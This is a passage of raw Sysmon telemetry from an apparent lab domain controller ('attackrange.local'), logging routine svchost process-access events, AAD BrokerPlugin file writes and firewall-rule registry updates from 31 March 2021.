.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.327{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000004739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\PolicyVersionDWORD (0x0000021a) 13241300x80000000000000004738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-3|C=S-1-15-3-8|C=S-1-15-3-9|C=S-1-15-3-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|M=microsoft.aad.brokerplugin_cw5n1h2txyewy|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|D=C:\Windows\SystemApps\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\|PFN=Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy| 13241300x80000000000000004737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{EDFEC311-6084-4835-9B9A-FCB5F059268C}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000004736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{E18ACCA9-26B0-4489-9750-CBAF9606BE2F}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 
13241300x80000000000000004735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{CCB0B43D-D639-4AF1-B396-7C77C42ED9F9}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x80000000000000004734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{014F3C97-B1CD-4CAD-AE0C-4514355B694A}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Security=Authenticate| 13241300x80000000000000004733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{4911EBDD-4116-44FE-8D9B-5EC268F5E22E}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Security=Authenticate| 13241300x80000000000000004732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{5464942D-757C-4907-A938-25C43C4B0DC2}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x80000000000000004731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{D43B2595-8716-4114-96F7-47B4425F1BA7}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x80000000000000004730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{6BB4EA5E-82C7-4FD6-AE72-6E90B6DE81BF}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x80000000000000004729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:15.265{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{38BCAA43-7AC2-48A4-A7BA-BF83D8B8555E}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 11241100x80000000000000004728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.234{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:15.234 23542300x80000000000000004727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.234{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.172{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.172{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.172{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.172{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.172{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.172{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 